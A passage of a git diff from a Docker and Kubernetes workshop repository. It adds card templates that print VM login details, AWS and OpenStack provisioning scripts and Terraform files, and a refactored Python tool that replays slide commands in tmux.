{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
  margin: 0;
  padding: 0;
  line-height: 1em;
  font-size: 14px;
}

table {
  border-spacing: 0;
  margin-top: 0.4em;
  margin-bottom: 0.4em;
  border-left: 0.8em double grey;
  padding-left: 0.4em;
}

div {
  float: left;
  border: 1px dotted black;
  padding-top: 1%;
  padding-bottom: 1%;
  /* columns * (width+left+right) < 100% */
  width: 21.5%;
  padding-left: 1.5%;
  padding-right: 1.5%;
}

p {
  margin: 0.4em 0 0.4em 0;
}

img {
  height: 4em;
  float: right;
  margin-right: -0.4em;
}

.logpass {
  font-family: monospace;
  font-weight: bold;
}

.pagebreak {
  page-break-after: always;
  clear: both;
  display: block;
  height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>

<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>

</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>
@@ -3,25 +3,22 @@
# Number of VMs per cluster
clustersize: 3

# The hostname of each node will be clusterprefix + a number
clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
-cards_template: settings/kube101.html
+cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in

# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)

# This can be "test" or "stable"
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
machine_version: 0.14.0

# Password used to connect with the "docker user"
-docker_user_password: training
+docker_user_password: training
@@ -3,25 +3,21 @@
# Number of VMs per cluster
clustersize: 3

# The hostname of each node will be clusterprefix + a number
clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in

# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)

# This can be "test" or "stable"
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
-machine_version: 0.14.0
+compose_version: 1.24.1
+machine_version: 0.15.0

# Password used to connect with the "docker user"
-docker_user_password: training
+docker_user_password: training
80 prepare-vms/setup-admin-clusters.sh Executable file
@@ -0,0 +1,80 @@
#!/bin/sh
set -e

retry () {
  N=$1
  I=0
  shift

  while ! "$@"; do
    I=$(($I+1))
    if [ $I -gt $N ]; then
      echo "FAILED, ABORTING"
      exit 1
    fi
    echo "FAILED, RETRYING ($I/$N)"
  done
}

export AWS_INSTANCE_TYPE=t3a.small

INFRA=infra/aws-eu-west-3

STUDENTS=2

PREFIX=$(date +%Y-%m-%d-%H-%M)

SETTINGS=admin-dmuc
TAG=$PREFIX-$SETTINGS
./workshopctl start \
    --tag $TAG \
    --infra $INFRA \
    --settings settings/$SETTINGS.yaml \
    --count $STUDENTS

retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl disabledocker $TAG
retry 5 ./workshopctl kubebins $TAG
./workshopctl cards $TAG

SETTINGS=admin-kubenet
TAG=$PREFIX-$SETTINGS
./workshopctl start \
    --tag $TAG \
    --infra $INFRA \
    --settings settings/$SETTINGS.yaml \
    --count $((3*$STUDENTS))

retry 5 ./workshopctl disableaddrchecks $TAG
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl kubebins $TAG
./workshopctl cards $TAG

SETTINGS=admin-kuberouter
TAG=$PREFIX-$SETTINGS
./workshopctl start \
    --tag $TAG \
    --infra $INFRA \
    --settings settings/$SETTINGS.yaml \
    --count $((3*$STUDENTS))

retry 5 ./workshopctl disableaddrchecks $TAG
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl kubebins $TAG
./workshopctl cards $TAG

#INFRA=infra/aws-us-west-1

export AWS_INSTANCE_TYPE=t3a.medium

SETTINGS=admin-test
TAG=$PREFIX-$SETTINGS
./workshopctl start \
    --tag $TAG \
    --infra $INFRA \
    --settings settings/$SETTINGS.yaml \
    --count $((3*$STUDENTS))

retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl kube $TAG 1.15.9
./workshopctl cards $TAG
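The retry helper at the top of this script keeps re-running a command until it succeeds, giving up after N failures. For reference, a rough Python equivalent of the same logic (the workshopctl invocation at the end is illustrative):

    import subprocess
    import sys

    def retry(n, *command):
        attempt = 0
        # Re-run the command until it exits with status 0.
        while subprocess.call(command) != 0:
            attempt += 1
            if attempt > n:
                print("FAILED, ABORTING")
                sys.exit(1)
            print("FAILED, RETRYING ({}/{})".format(attempt, n))

    retry(5, "./workshopctl", "deploy", "TAG")  # illustrative invocation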
290 prepare-vms/templates/cards.html Normal file
@@ -0,0 +1,290 @@
{#
   The variables below can be customized here directly, or in your
   settings.yaml file. Any variable in settings.yaml will be exposed
   in here as well.
#}

{%- set url = url
    | default("http://FIXME.container.training/") -%}
{%- set pagesize = pagesize
    | default(9) -%}
{%- set lang = lang
    | default("en") -%}
{%- set event = event
    | default("training session") -%}
{%- set backside = backside
    | default(False) -%}
{%- set image = image
    | default("kube") -%}
{%- set clusternumber = clusternumber
    | default(None) -%}
{%- if qrcode == True -%}
{%- set qrcode = "https://container.training/q" -%}
{%- elif qrcode -%}
{%- set qrcode = qrcode -%}
{%- endif -%}

{# You can also set img_bottom_src instead. #}
{%- set img_logo_src = {
    "docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
    "swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
    "kube": "https://avatars1.githubusercontent.com/u/13629408",
    "enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
}[image] -%}
{%- if lang == "en" and clustersize == 1 -%}
{%- set intro -%}
Here is the connection information to your very own
machine for this {{ event }}.
You can connect to this VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machine is:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clustersize != 1 -%}
{%- set intro -%}
Here is the connection information to your very own
cluster for this {{ event }}.
You can connect to each VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machines are:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize == 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
machine pour cette formation.
Vous pouvez vous connecter à cette machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresse IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clusterprefix != "node" -%}
{%- set intro -%}
Here is the connection information for the
<strong>{{ clusterprefix }}</strong> environment.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize != 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
cluster pour cette formation.
Vous pouvez vous connecter à chaque machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresses IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');

{% if paper_size == "A4" %}
@page {
  size: A4; /* Change from the default size of A4 */
  margin: 0.5cm; /* Set margin on each page */
}
body {
  /* this is A4 minus 0.5cm margins */
  width: 20cm;
  height: 28.7cm;
}
{% elif paper_size == "Letter" %}
@page {
  size: Letter;
  margin: 0.2in;
}
body {
  /* this is Letter minus 0.2in margins */
  width: 8.6in;
  height: 10.6in;
}
{% endif %}

body, table {
  margin: 0;
  padding: 0;
  line-height: 1em;
  font-size: 15px;
  font-family: 'Slabo 27px';
}

table {
  border-spacing: 0;
  margin-top: 0.4em;
  margin-bottom: 0.4em;
  border-left: 0.8em double grey;
  padding-left: 0.4em;
}

div {
  float: left;
  border: 1px dotted black;
  {% if backside %}
  height: 33%;
  {% endif %}
  /* columns * (width+left+right) < 100% */
  /*
  width: 24.8%;
  */
  /**/
  width: 33%;
  /**/
}

p {
  margin: 0.8em;
}

div.back {
  border: 1px dotted grey;
}

span.scale {
  white-space: nowrap;
}

img.logo {
  height: 4.5em;
  float: right;
}

img.bottom {
  height: 2.5em;
  display: block;
  margin: 0.5em auto;
}

.qrcode img {
  width: 40%;
  margin: 1em;
}

.logpass {
  font-family: monospace;
  font-weight: bold;
}

.pagebreak {
  page-break-after: always;
  clear: both;
  display: block;
  height: 0;
}
</style>
<script type="text/javascript" src="https://cdn.rawgit.com/davidshimjs/qrcodejs/gh-pages/qrcode.min.js"></script>
<script type="text/javascript">
function qrcodes() {
  [].forEach.call(
    document.getElementsByClassName("qrcode"),
    (e, index) => {
      new QRCode(e, {
        text: "{{ qrcode }}",
        correctLevel: QRCode.CorrectLevel.L
      });
    }
  );
}

function scale() {
  [].forEach.call(
    document.getElementsByClassName("scale"),
    (e, index) => {
      var text_width = e.getBoundingClientRect().width;
      var box_width = e.parentElement.getBoundingClientRect().width;
      var percent = 100 * box_width / text_width + "%";
      e.style.fontSize = percent;
    }
  );
}
</script>
</head>
<body onload="qrcodes(); scale();">
{% for cluster in clusters %}
<div>
<p>{{ intro }}</p>
<p>
{% if img_logo_src %}
<img class="logo" src="{{ img_logo_src }}" />
{% endif %}
<table>
{% if clusternumber != None %}
<tr><td>cluster:</td></tr>
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
{% endif %}
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>

</p>
<p>
{{ listhead }}
<table>
{% for node in cluster %}
<tr>
<td>{{ clusterprefix }}{{ loop.index }}:</td>
<td>{{ node }}</td>
</tr>
{% endfor %}
</table>
</p>

<p>
{% if url %}
{{ slides_are_at }}
<p>
<span class="scale">{{ url }}</span>
</p>
{% endif %}
{% if img_bottom_src %}
<img class="bottom" src="{{ img_bottom_src }}" />
{% endif %}
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="back">
<p>Thanks for attending
"Getting Started With Kubernetes and Container Orchestration"
during CONFERENCE in Month YYYY!</p>
<p>If you liked that workshop,
I can train your team, in person or
online, with custom courses of
any length and any level.
</p>
{% if qrcode %}
<p>If you're interested, please scan that QR code to contact me:</p>
<span class="qrcode"></span>
{% else %}
<p>If you're interested, you can contact me at:</p>
{% endif %}
<p>jerome.petazzoni@gmail.com</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>
</html>
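The template's header comment says every variable from settings.yaml is exposed to it, and the for loops above iterate over a clusters variable (one list of node addresses per cluster). A minimal rendering sketch, assuming Jinja2 is installed; the IP addresses and output filename are illustrative:

    from jinja2 import Environment, FileSystemLoader

    env = Environment(loader=FileSystemLoader("prepare-vms/templates"))
    template = env.get_template("cards.html")
    html = template.render(
        clusters=[["10.0.0.10", "10.0.0.11", "10.0.0.12"]],  # illustrative
        clustersize=3,
        clusterprefix="node",
        paper_size="A4",
        docker_user_password="training",
    )
    with open("cards-rendered.html", "w") as f:  # hypothetical output file
        f.write(html)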
5 prepare-vms/terraform/keypair.tf Normal file
@@ -0,0 +1,5 @@
resource "openstack_compute_keypair_v2" "ssh_deploy_key" {
  name       = "${var.prefix}"
  public_key = "${file("~/.ssh/id_rsa.pub")}"
}
32 prepare-vms/terraform/machines.tf Normal file
@@ -0,0 +1,32 @@
resource "openstack_compute_instance_v2" "machine" {
  count           = "${var.count}"
  name            = "${format("%s-%04d", "${var.prefix}", count.index+1)}"
  image_name      = "Ubuntu 16.04.5 (Xenial Xerus)"
  flavor_name     = "${var.flavor}"
  security_groups = ["${openstack_networking_secgroup_v2.full_access.name}"]
  key_pair        = "${openstack_compute_keypair_v2.ssh_deploy_key.name}"

  network {
    name        = "${openstack_networking_network_v2.internal.name}"
    fixed_ip_v4 = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
  }
}

resource "openstack_compute_floatingip_v2" "machine" {
  count = "${var.count}"
  # This is something provided to us by Enix when our tenant was provisioned.
  pool  = "Public Floating"
}

resource "openstack_compute_floatingip_associate_v2" "machine" {
  count       = "${var.count}"
  floating_ip = "${openstack_compute_floatingip_v2.machine.*.address[count.index]}"
  instance_id = "${openstack_compute_instance_v2.machine.*.id[count.index]}"
  fixed_ip    = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
}

output "ip_addresses" {
  value = "${join("\n", openstack_compute_floatingip_v2.machine.*.address)}"
}

variable "flavor" {}
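The fixed_ip_v4 above is computed with cidrhost(cidr, count.index+10): host number index+10 inside the 10.10.0.0/16 subnet defined in network.tf below. The same arithmetic, checked with Python's standard library:

    import ipaddress

    subnet = ipaddress.ip_network("10.10.0.0/16")
    for index in range(3):
        # cidrhost(cidr, index+10) in Terraform == subnet[index + 10] here
        print(subnet[index + 10])  # 10.10.0.10, 10.10.0.11, 10.10.0.12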
23 prepare-vms/terraform/network.tf Normal file
@@ -0,0 +1,23 @@
resource "openstack_networking_network_v2" "internal" {
  name = "${var.prefix}"
}

resource "openstack_networking_subnet_v2" "internal" {
  name            = "${var.prefix}"
  network_id      = "${openstack_networking_network_v2.internal.id}"
  cidr            = "10.10.0.0/16"
  ip_version      = 4
  dns_nameservers = ["1.1.1.1"]
}

resource "openstack_networking_router_v2" "router" {
  name                = "${var.prefix}"
  external_network_id = "15f0c299-1f50-42a6-9aff-63ea5b75f3fc"
}

resource "openstack_networking_router_interface_v2" "router_internal" {
  router_id = "${openstack_networking_router_v2.router.id}"
  subnet_id = "${openstack_networking_subnet_v2.internal.id}"
}
13 prepare-vms/terraform/provider.tf Normal file
@@ -0,0 +1,13 @@
provider "openstack" {
  user_name   = "${var.user}"
  tenant_name = "${var.tenant}"
  domain_name = "${var.domain}"
  password    = "${var.password}"
  auth_url    = "${var.auth_url}"
}

variable "user" {}
variable "tenant" {}
variable "domain" {}
variable "password" {}
variable "auth_url" {}
12 prepare-vms/terraform/secgroup.tf Normal file
@@ -0,0 +1,12 @@
resource "openstack_networking_secgroup_v2" "full_access" {
  name = "${var.prefix} - full access"
}

resource "openstack_networking_secgroup_rule_v2" "full_access" {
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = ""
  remote_ip_prefix  = "0.0.0.0/0"
  security_group_id = "${openstack_networking_secgroup_v2.full_access.id}"
}
8 prepare-vms/terraform/vars.tf Normal file
@@ -0,0 +1,8 @@
variable "prefix" {
  type = "string"
}

variable "count" {
  type = "string"
}
@@ -1,20 +1,19 @@
#!/bin/bash

-# Get the script's real directory, whether we're being called directly or via a symlink
+# Get the script's real directory.
+# This should work whether we're being called directly or via a symlink.
if [ -L "$0" ]; then
  export SCRIPT_DIR=$(dirname $(readlink "$0"))
else
  export SCRIPT_DIR=$(dirname "$0")
fi

-# Load all scriptlets
+# Load all scriptlets.
cd "$SCRIPT_DIR"
for lib in lib/*.sh; do
  . $lib
done

TRAINER_IMAGE="preparevms_prepare-vms"

DEPENDENCIES="
aws
ssh
@@ -25,49 +24,26 @@ DEPENDENCIES="
man
"

ENVVARS="
AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
AWS_DEFAULT_REGION
SSH_AUTH_SOCK
"
# Check for missing dependencies, and issue a warning if necessary.
missing=0
for dependency in $DEPENDENCIES; do
  if ! command -v $dependency >/dev/null; then
    warning "Dependency $dependency could not be found."
    missing=1
  fi
done
if [ $missing = 1 ]; then
  warning "At least one dependency is missing. Install it or try the image wrapper."
fi

check_envvars() {
  status=0
  for envvar in $ENVVARS; do
    if [ -z "${!envvar}" ]; then
      error "Environment variable $envvar is not set."
      if [ "$envvar" = "SSH_AUTH_SOCK" ]; then
        error "Hint: run 'eval \$(ssh-agent) ; ssh-add' and try again?"
      fi
      status=1
    fi
  done
  return $status
}
# Check if SSH_AUTH_SOCK is set.
# (If it's not, deployment will almost certainly fail.)
if [ -z "${SSH_AUTH_SOCK}" ]; then
  warning "Environment variable SSH_AUTH_SOCK is not set."
  warning "Hint: run 'eval \$(ssh-agent) ; ssh-add' and try again?"
fi

check_dependencies() {
  status=0
  for dependency in $DEPENDENCIES; do
    if ! command -v $dependency >/dev/null; then
      warning "Dependency $dependency could not be found."
      status=1
    fi
  done
  return $status
}

check_image() {
  docker inspect $TRAINER_IMAGE >/dev/null 2>&1
}

check_envvars \
  || die "Please set all required environment variables."

check_dependencies \
  || warning "At least one dependency is missing. Install it or try the image wrapper."

-# Now check which command was invoked and execute it
+# Now check which command was invoked and execute it.
if [ "$1" ]; then
  cmd="$1"
  shift
@@ -77,6 +53,3 @@ fi
fun=_cmd_$cmd
type -t $fun | grep -q function || die "Invalid command: $cmd"
$fun "$@"

# export SSH_AUTH_DIRNAME=$(dirname $SSH_AUTH_SOCK)
# docker-compose run prepare-vms "$@"
4 prepare-vms/www/README Normal file
@@ -0,0 +1,4 @@
This directory will contain symlinks to HTML and PDF files for the cards
with the IP address, login, and password for the training environments.

The file "index.html" is empty on purpose: it prevents listing the files.
0 prepare-vms/www/index.html Normal file
4 slides/Dockerfile Normal file
@@ -0,0 +1,4 @@
FROM alpine:3.11
RUN apk add --no-cache entr py3-pip git zip
COPY requirements.txt .
RUN pip3 install -r requirements.txt
@@ -34,6 +34,14 @@ compile each `foo.yml` file into `foo.yml.html`.
You can also run `./build.sh forever`: it will monitor the current
directory and rebuild slides automatically when files are modified.

If you have problems running `./build.sh` (because of
Python dependencies or whatever),
you can also run `docker-compose up` in this directory.
It will start the `./build.sh forever` script in a container.
It will also start a web server exposing the slides
(but the slides should also work if you load them from your
local filesystem).


## Publishing pipeline

@@ -53,4 +61,4 @@ You can run `./slidechecker foo.yml.html` to check for
missing images and show the number of slides in that deck.
It requires `phantomjs` to be installed. It takes some
time to run so it is not yet integrated with the publishing
-pipeline.
+pipeline.
15 slides/_redirects Normal file
@@ -0,0 +1,15 @@
# Uncomment and/or edit one of the following lines if necessary.
#/ /kube-halfday.yml.html 200
#/ /kube-fullday.yml.html 200
#/ /kube-twodays.yml.html 200

# And this allows to do "git clone https://container.training".
/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack

#/dockermastery https://www.udemy.com/course/docker-mastery/?referralCode=1410924A733D33635CCB
#/kubernetesmastery https://www.udemy.com/course/kubernetesmastery/?referralCode=7E09090AF9B79E6C283F
/dockermastery https://www.udemy.com/course/docker-mastery/?couponCode=SWEETFEBSALEC1
/kubernetesmastery https://www.udemy.com/course/kubernetesmastery/?couponCode=SWEETFEBSALEC4

# Shortlink for the QRCode
/q /qrcode.html 200
@@ -26,9 +26,10 @@ IPADDR = None
class State(object):

    def __init__(self):
+       self.clipboard = ""
        self.interactive = True
-       self.verify_status = False
-       self.simulate_type = True
+       self.verify_status = True
+       self.simulate_type = False
        self.switch_desktop = False
        self.sync_slides = False
        self.open_links = False
@@ -38,6 +39,7 @@ class State(object):

    def load(self):
        data = yaml.load(open("state.yaml"))
+       self.clipboard = str(data["clipboard"])
        self.interactive = bool(data["interactive"])
        self.verify_status = bool(data["verify_status"])
        self.simulate_type = bool(data["simulate_type"])
|
||||
def save(self):
|
||||
with open("state.yaml", "w") as f:
|
||||
yaml.dump(dict(
|
||||
clipboard=self.clipboard,
|
||||
interactive=self.interactive,
|
||||
verify_status=self.verify_status,
|
||||
simulate_type=self.simulate_type,
|
||||
@@ -66,6 +69,8 @@ class State(object):
|
||||
state = State()
|
||||
|
||||
|
||||
outfile = open("autopilot.log", "w")
|
||||
|
||||
def hrule():
|
||||
return "="*int(subprocess.check_output(["tput", "cols"]))
|
||||
|
||||
@@ -85,9 +90,11 @@
        # On single-line snippets, the data follows the method immediately
        if '\n' in content:
            self.method, self.data = content.split('\n', 1)
-       else:
-           self.data = self.data.strip()
+       elif ' ' in content:
+           self.method, self.data = content.split(' ', 1)
+           self.data = self.data.strip()
+       else:
+           self.method, self.data = content, None
        self.next = None

    def __str__(self):
@@ -186,7 +193,7 @@
    if last_line == "$":
        # This is a perfect opportunity to grab the node's IP address
        global IPADDR
-       IPADDR = re.findall("^\[(.*)\]", output, re.MULTILINE)[-1]
+       IPADDR = re.findall("\[(.*)\]", output, re.MULTILINE)[-1]
        return
    # When we are in an alpine container, the prompt will be "/ #"
    if last_line == "/ #":
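The change drops the ^ anchor: with re.MULTILINE, "^\[(.*)\]" only matched a bracketed group at the start of a line, while "\[(.*)\]" matches one anywhere in the captured output. A quick check, assuming a prompt that embeds the node's IP address in square brackets:

    import re

    output = "[10.0.0.10] docker@node1 ~\n$"  # illustrative prompt output
    print(re.findall(r"\[(.*)\]", output, re.MULTILINE)[-1])  # 10.0.0.10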
@@ -223,7 +230,7 @@ def check_exit_status():
def setup_tmux_and_ssh():
    if subprocess.call(["tmux", "has-session"]):
        logging.error("Couldn't connect to tmux. Please setup tmux first.")
-       ipaddr = open("../../prepare-vms/ips.txt").read().split("\n")[0]
+       ipaddr = "$IPADDR"
        uid = os.getuid()

        raise Exception("""
@@ -235,6 +242,8 @@ tmux

rm -f /tmp/tmux-{uid}/default && ssh -t -L /tmp/tmux-{uid}/default:/tmp/tmux-1001/default docker@{ipaddr} tmux new-session -As 0

+(Or use workshopctl tmux)
+
3. If you cannot control a remote tmux:

tmux new-session ssh docker@{ipaddr}
@@ -259,26 +268,11 @@ for slide in re.split("\n---?\n", content):
        slide_classes = slide_classes[0].split(",")
        slide_classes = [c.strip() for c in slide_classes]
        if excluded_classes & set(slide_classes):
-           logging.info("Skipping excluded slide.")
+           logging.debug("Skipping excluded slide.")
            continue
    slides.append(Slide(slide))


-def send_keys(data):
-    if state.simulate_type and data[0] != '^':
-        for key in data:
-            if key == ";":
-                key = "\\;"
-            if key == "\n":
-                if interruptible_sleep(1): return
-            subprocess.check_call(["tmux", "send-keys", key])
-            if interruptible_sleep(0.15*random.random()): return
-            if key == "\n":
-                if interruptible_sleep(1): return
-    else:
-        subprocess.check_call(["tmux", "send-keys", data])


def capture_pane():
    return subprocess.check_output(["tmux", "capture-pane", "-p"]).decode('utf-8')
@@ -288,7 +282,7 @@ setup_tmux_and_ssh()

try:
    state.load()
-   logging.info("Successfully loaded state from file.")
+   logging.debug("Successfully loaded state from file.")
    # Let's override the starting state, so that when an error occurs,
    # we can restart the auto-tester and then single-step or debug.
    # (Instead of running again through the same issue immediately.)
@@ -297,6 +291,7 @@ except Exception as e:
    logging.exception("Could not load state from file.")
    logging.warning("Using default values.")


def move_forward():
    state.snippet += 1
    if state.snippet > len(slides[state.slide].snippets):
@@ -320,10 +315,147 @@ def check_bounds():
        state.slide = len(slides)-1


##########################################################
# All functions starting with action_ correspond to the
# code to be executed when seeing ```foo``` blocks in the
# input. ```foo``` would call action_foo(state, snippet).
##########################################################


def send_keys(keys):
    subprocess.check_call(["tmux", "send-keys", keys])

# Send a single key.
# Useful for special keys, e.g. tmux interprets these strings:
# ^C (and all other sequences starting with a caret)
# Space
# ... and many others (check tmux manpage for details).
def action_key(state, snippet):
    send_keys(snippet.data)


# Send multiple keys.
# If keystroke simulation is off, all keys are sent at once.
# If keystroke simulation is on, keys are sent one by one, with a delay between them.
def action_keys(state, snippet, keys=None):
    if keys is None:
        keys = snippet.data
    if not state.simulate_type:
        send_keys(keys)
    else:
        for key in keys:
            if key == ";":
                key = "\\;"
            if key == "\n":
                if interruptible_sleep(1): return
            send_keys(key)
            if interruptible_sleep(0.15*random.random()): return
            if key == "\n":
                if interruptible_sleep(1): return


def action_hide(state, snippet):
    if state.run_hidden:
        action_bash(state, snippet)


def action_bash(state, snippet):
    data = snippet.data
    # Make sure that we're ready
    wait_for_prompt()
    # Strip leading spaces
    data = re.sub("\n +", "\n", data)
    # Remove backticks (they are used to highlight sections)
    data = data.replace('`', '')
    # Add "RETURN" at the end of the command :)
    data += "\n"
    # Send command
    action_keys(state, snippet, data)
    # Force a short sleep to avoid race condition
    time.sleep(0.5)
    if snippet.next and snippet.next.method == "wait":
        wait_for_string(snippet.next.data)
    elif snippet.next and snippet.next.method == "longwait":
        wait_for_string(snippet.next.data, 10*TIMEOUT)
    else:
        wait_for_prompt()
    # Verify return code
    check_exit_status()


def action_copy(state, snippet):
    screen = capture_pane()
    matches = re.findall(snippet.data, screen, flags=re.DOTALL)
    if len(matches) == 0:
        raise Exception("Could not find regex {} in output.".format(snippet.data))
    # Arbitrarily get the most recent match
    match = matches[-1]
    # Remove line breaks (like a screen copy paste would do)
    match = match.replace('\n', '')
    logging.debug("Copied {} to clipboard.".format(match))
    state.clipboard = match


def action_paste(state, snippet):
    logging.debug("Pasting {} from clipboard.".format(state.clipboard))
    action_keys(state, snippet, state.clipboard)


def action_check(state, snippet):
    wait_for_prompt()
    check_exit_status()


def action_open(state, snippet):
    # Cheap way to get node1's IP address
    screen = capture_pane()
    url = snippet.data.replace("/node1", "/{}".format(IPADDR))
    # This should probably be adapted to run on different OS
    if state.open_links:
        subprocess.check_output(["xdg-open", url])
        focus_browser()
    if state.interactive:
        print("Press any key to continue to next step...")
        click.getchar()


def action_tmux(state, snippet):
    subprocess.check_call(["tmux"] + snippet.data.split())


def action_unknown(state, snippet):
    logging.warning("Unknown method {}: {!r}".format(snippet.method, snippet.data))


def run_snippet(state, snippet):
    logging.info("Running with method {}: {}".format(snippet.method, snippet.data))
    try:
        action = globals()["action_"+snippet.method]
    except KeyError:
        action = action_unknown
    try:
        action(state, snippet)
        result = "OK"
    except:
        result = "ERR"
        logging.exception("While running method {} with {!r}".format(snippet.method, snippet.data))
        # Try to recover
        try:
            wait_for_prompt()
        except:
            subprocess.check_call(["tmux", "new-window"])
            wait_for_prompt()
    outfile.write("{} SLIDE={} METHOD={} DATA={!r}\n".format(result, state.slide, snippet.method, snippet.data))
    outfile.flush()


while True:
    state.save()
    slide = slides[state.slide]
-   snippet = slide.snippets[state.snippet-1] if state.snippet else None
+   if state.snippet and state.snippet <= len(slide.snippets):
+       snippet = slide.snippets[state.snippet-1]
+   else:
+       snippet = None
    click.clear()
    print("[Slide {}/{}] [Snippet {}/{}] [simulate_type:{}] [verify_status:{}] "
          "[switch_desktop:{}] [sync_slides:{}] [open_links:{}] [run_hidden:{}]"
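run_snippet above resolves handlers by name: a snippet whose method is "bash" is routed to action_bash via globals(), with action_unknown as the fallback. The pattern in isolation:

    def action_hello(state, snippet):
        print("hello:", snippet)

    def action_unknown(state, snippet):
        print("no handler for:", snippet)

    def dispatch(method, state, snippet):
        # Same name-based lookup as run_snippet, with a fallback.
        action = globals().get("action_" + method, action_unknown)
        action(state, snippet)

    dispatch("hello", None, "world")    # -> hello: world
    dispatch("missing", None, "data")   # -> no handler for: data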
@@ -385,7 +517,10 @@ while True:
        # continue until next timeout
        state.interactive = False
    elif command in ("y", "\r", " "):
-       if not snippet:
+       if snippet:
+           run_snippet(state, snippet)
+           move_forward()
+       else:
-           # Advance to next snippet
+           # Advance until a slide that has snippets
            while not slides[state.slide].snippets:
@@ -395,59 +530,5 @@ while True:
                break
            # And then advance to the snippet
            move_forward()
            continue
-       method, data = snippet.method, snippet.data
-       logging.info("Running with method {}: {}".format(method, data))
-       if method == "keys":
-           send_keys(data)
-       elif method == "bash" or (method == "hide" and state.run_hidden):
-           # Make sure that we're ready
-           wait_for_prompt()
-           # Strip leading spaces
-           data = re.sub("\n +", "\n", data)
-           # Remove backticks (they are used to highlight sections)
-           data = data.replace('`', '')
-           # Add "RETURN" at the end of the command :)
-           data += "\n"
-           # Send command
-           send_keys(data)
-           # Force a short sleep to avoid race condition
-           time.sleep(0.5)
-           if snippet.next and snippet.next.method == "wait":
-               wait_for_string(snippet.next.data)
-           elif snippet.next and snippet.next.method == "longwait":
-               wait_for_string(snippet.next.data, 10*TIMEOUT)
-           else:
-               wait_for_prompt()
-           # Verify return code
-           check_exit_status()
-       elif method == "copypaste":
-           screen = capture_pane()
-           matches = re.findall(data, screen, flags=re.DOTALL)
-           if len(matches) == 0:
-               raise Exception("Could not find regex {} in output.".format(data))
-           # Arbitrarily get the most recent match
-           match = matches[-1]
-           # Remove line breaks (like a screen copy paste would do)
